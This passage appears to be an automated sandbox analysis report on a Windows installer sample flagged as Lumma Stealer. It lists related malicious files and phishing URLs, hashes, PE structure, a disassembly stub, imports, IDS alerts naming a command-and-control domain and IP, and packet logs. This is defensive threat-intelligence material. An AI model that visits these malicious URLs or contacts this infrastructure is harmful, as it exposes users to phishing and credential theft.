	SecuriteInfo.com.Win32.SpywareX-gen.20761.26247.dll	Get hash	malicious	Unknown	Browse	23.51.58.94 20.12.23.50
	TNQTc6Qmkg.exe	Get hash	malicious	Mars Stealer, RedLine, SectopRAT, Stealc, Vidar	Browse	23.51.58.94 20.12.23.50
	https://thehitchhouse.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	23.51.58.94 20.12.23.50
	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	23.51.58.94 20.12.23.50
	https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.html	Get hash	malicious	HTMLPhisher	Browse	23.51.58.94 20.12.23.50
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	172.67.155.93
	Document_a51_19i793302-14b09981a5569-3684u8.js	Get hash	malicious	Latrodectus	Browse	172.67.155.93
	360total.dll.dll	Get hash	malicious	Latrodectus	Browse	172.67.155.93
	Purchase Order is approved26042024.cmd	Get hash	malicious	Remcos, DBatLoader	Browse	172.67.155.93
	https://control.mailblaze.com/index.php/survey/wq790f4mf09e0	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	172.67.155.93
	neo.msi	Get hash	malicious	Latrodectus	Browse	172.67.155.93
	z55NF-Faturada-23042024.msi	Get hash	malicious	MicroClip	Browse	172.67.155.93
	ePI4igo4y1.exe	Get hash	malicious	AsyncRAT	Browse	172.67.155.93
	file.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.155.93
	file.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.155.93

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.685042377595043
TrID:	Win32 Executable (generic) a (10002005/4) 97.75% Windows ActiveX control (116523/4) 1.14% Inno Setup installer (109748/4) 1.07% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	file.exe
File size:	1'800'704 bytes
MD5:	24dd75b0a7bb9a0e0918ee0dd84a581a
SHA1:	de796b237488df3d26a99aa8a78098c010aeb2c9
SHA256:	878966291372a9633242af15570a8bbe31699b5e0b650e806af4742da1f6b35d
SHA512:	53f951d795fbf760dd593619bb3f96fd604bc15adb4f637457d28fbd78ae3764afd4e9c9a755a6241431ad4664dd30e4a2df84e33fe59954f7c55da0e4038557
SSDEEP:	24576:qnbbGmgK4brDi4IxgRqzwqNb+Yz73P2EMZbG0JEtXlCbWqx9quTYtXU+x42dLE:oHsKh4nqzF3PYdStVCb7DTiXU+C2ZE
TLSH:	AB857C22A3914437D4721E355D2BD2B42D267D312EB4E84A7EF8BE0D1E38B41BD357A2
File Content Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	031b33374923232f

Static PE Info

General

Entrypoint:	0x5025d8
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5B226D52 [Thu Jun 14 13:27:46 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	f62b90e31eca404f228fcf7068b00f31

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
push esi
push edi
mov eax, 00500930h
call 00007FB3DC5CC6F6h
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov ebx, dword ptr [eax+00000170h]
push ebx
call 00007FB3DC5CD5A1h
and eax, FFFFFF7Fh
push eax
push FFFFFFECh
mov eax, dword ptr [00505E5Ch]
push ebx
call 00007FB3DC5CD7F6h
xor eax, eax
push ebp
push 00502653h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
push 00000001h
call 00007FB3DC5CCF41h
call 00007FB3DC6C3DDCh
mov eax, dword ptr [00500568h]
push eax
push 005005CCh
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
call 00007FB3DC63FBCDh
call 00007FB3DC6C3E30h
xor eax, eax
pop edx
pop ecx
pop ecx
mov dword ptr fs:[eax], edx
jmp 00007FB3DC6C5DABh
jmp 00007FB3DC5C7E1Dh
call 00007FB3DC6C3BACh
mov eax, 00000001h
call 00007FB3DC5C88DEh
call 00007FB3DC5C8261h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, 005027E8h
call 00007FB3DC63F6D8h
push 00000005h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+00000170h]
push eax
call 00007FB3DC5CD7B7h
mov eax, dword ptr [00505E5Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [004DACA0h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10e000	0x3840	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x114000	0xaf200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x113000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10ea80	0x88c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xffdc8	0xffe00	b9852eae83b24e65fe1d67a2f1390c9a	False	0.48306210307767466	data	6.484390133841002	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x101000	0x17f4	0x1800	8e0d52126a75001416d71c23878be2c1	False	0.5244140625	data	6.003729381717893	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x103000	0x308c	0x3200	c2acc8e96fc244753abd1d87bb624bc0	False	0.425078125	data	4.3575606000501415	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x107000	0x6198	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x10e000	0x3840	0x3a00	0e1e8128f777a5ff18a144305a4fb39c	False	0.3108836206896552	data	5.2048781278956655	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x112000	0x3c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x113000	0x18	0x200	9cf98ea6bb17a35d99fa770a2e9a8ff0	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x114000	0xaf200	0xaf200	e56b7a46fa248db713f13fd0a70ee7d9	False	0.550715727605282	data	6.709232434049833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x114c74	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x114da8	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x114edc	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x115010	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x115144	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x115278	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x1153ac	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x1154e0	0x4e8	Device independent bitmap graphic, 48 x 48 x 4, image size 1152			0.2945859872611465
RT_BITMAP	0x1159c8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.521551724137931
RT_ICON	0x115ab0	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.1779410894458088
RT_ICON	0x157ad8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4320539419087137
RT_ICON	0x15a080	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5265009380863039
RT_ICON	0x15b128	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6196721311475409
RT_ICON	0x15bab0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.726063829787234
RT_STRING	0x15bf18	0xec	data			0.6059322033898306
RT_STRING	0x15c004	0x250	data			0.47466216216216217
RT_STRING	0x15c254	0x28c	data			0.4647239263803681
RT_STRING	0x15c4e0	0x3e4	data			0.4347389558232932
RT_STRING	0x15c8c4	0x9c	data			0.717948717948718
RT_STRING	0x15c960	0xe8	data			0.6293103448275862
RT_STRING	0x15ca48	0x468	data			0.3820921985815603
RT_STRING	0x15ceb0	0x38c	data			0.3898678414096916
RT_STRING	0x15d23c	0x3dc	data			0.39271255060728744
RT_STRING	0x15d618	0x360	data			0.37037037037037035
RT_STRING	0x15d978	0x40c	data			0.3783783783783784
RT_STRING	0x15dd84	0x108	data			0.5113636363636364
RT_STRING	0x15de8c	0xcc	data			0.6029411764705882
RT_STRING	0x15df58	0x234	data			0.5070921985815603
RT_STRING	0x15e18c	0x3c8	data			0.3181818181818182
RT_STRING	0x15e554	0x32c	data			0.43349753694581283
RT_STRING	0x15e880	0x2a0	data			0.41964285714285715
RT_RCDATA	0x15eb20	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x166e08	0x10	data			1.5
RT_RCDATA	0x166e18	0x1800	PE32+ executable (console) x86-64, for MS Windows	English	United States	0.3924153645833333
RT_RCDATA	0x168618	0x6bc	data			0.6467517401392111
RT_RCDATA	0x168cd4	0x5b10	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows	English	United States	0.3255404941660947
RT_RCDATA	0x16e7e4	0x125	Delphi compiled form 'TMainForm'			0.7508532423208191
RT_RCDATA	0x16e90c	0x3a2	Delphi compiled form 'TNewDiskForm'			0.524731182795699
RT_RCDATA	0x16ecb0	0x320	Delphi compiled form 'TSelectFolderForm'			0.53625
RT_RCDATA	0x16efd0	0x300	Delphi compiled form 'TSelectLanguageForm'			0.5703125
RT_RCDATA	0x16f2d0	0x5d9	Delphi compiled form 'TUninstallProgressForm'			0.4562458249832999
RT_RCDATA	0x16f8ac	0x461	Delphi compiled form 'TUninstSharedFileForm'			0.4335414808206958
RT_RCDATA	0x16fd10	0x2092	Delphi compiled form 'TWizardForm'			0.2299112497001679
RT_GROUP_CURSOR	0x171da4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x171db8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x171dcc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x171de0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x171df4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x171e08	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x171e1c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x171e30	0x4c	data	English	United States	0.8026315789473685
RT_VERSION	0x171e7c	0x15c	data	English	United States	0.5689655172413793
RT_MANIFEST	0x171fd8	0x62c	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4240506329113924

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	GetKeyboardType, LoadStringW, MessageBoxA, CharNextW
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
user32.dll	CreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
msimg32.dll	AlphaBlend
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
mpr.dll	WNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
kernel32.dll	lstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
advapi32.dll	SetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
comctl32.dll	InitCommonControls
kernel32.dll	Sleep
oleaut32.dll	GetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	ShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
shell32.dll	SHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
ole32.dll	CoDisconnectObject
advapi32.dll	AdjustTokenPrivileges
oleaut32.dll	SysFreeString

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/27/24-13:26:27.497604	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49755	443	192.168.2.4	172.67.155.93
04/27/24-13:26:36.893528	UDP	2052046	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop)	54027	53	192.168.2.4	1.1.1.1
04/27/24-13:26:23.378200	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49751	443	192.168.2.4	172.67.155.93
04/27/24-13:27:32.334368	UDP	2052046	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop)	60308	53	192.168.2.4	1.1.1.1
04/27/24-13:26:26.585236	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49754	443	192.168.2.4	172.67.155.93
04/27/24-13:26:23.272724	UDP	2052046	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop)	65136	53	192.168.2.4	1.1.1.1
04/27/24-13:26:29.422008	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49757	443	192.168.2.4	172.67.155.93
04/27/24-13:26:25.775214	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49753	443	192.168.2.4	172.67.155.93
04/27/24-13:26:24.897555	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49752	443	192.168.2.4	172.67.155.93
04/27/24-13:26:28.686063	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49756	443	192.168.2.4	172.67.155.93
04/27/24-13:26:31.854854	TCP	2052047	ET TROJAN Observed Lumma Stealer Related Domain (palmeventeryjusk .shop in TLS SNI)	49758	443	192.168.2.4	172.67.155.93
04/27/24-13:27:00.927077	UDP	2052046	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (palmeventeryjusk .shop)	60371	53	192.168.2.4	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 27, 2024 13:25:49.943315029 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 27, 2024 13:25:51.099540949 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 27, 2024 13:26:00.710753918 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 27, 2024 13:26:03.353935957 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.354022980 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.354094028 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.354284048 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.354322910 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.363100052 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.363136053 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.363199949 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.363450050 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.363472939 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.487814903 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.487843990 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.487900019 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.488073111 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.488084078 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.616375923 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.616625071 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.616688013 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.617568970 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.617645025 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.618500948 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.618570089 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.618649006 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.618666887 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.626761913 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.626951933 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.626967907 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.630496025 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.630615950 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.630846024 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.630944014 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.630950928 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.631017923 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.660742998 CEST	49735	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.723220110 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.723228931 CEST	443	49736	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.750591040 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.750917912 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.750933886 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.751777887 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.751830101 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.752319098 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.752372980 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.752446890 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.752454042 CEST	443	49737	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:03.926346064 CEST	49736	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:03.957632065 CEST	49737	443	192.168.2.4	142.251.32.100
Apr 27, 2024 13:26:04.107861042 CEST	443	49735	142.251.32.100	192.168.2.4
Apr 27, 2024 13:26:04.107959986 CEST	443	49735	142.251.32.100	192.168.2.4
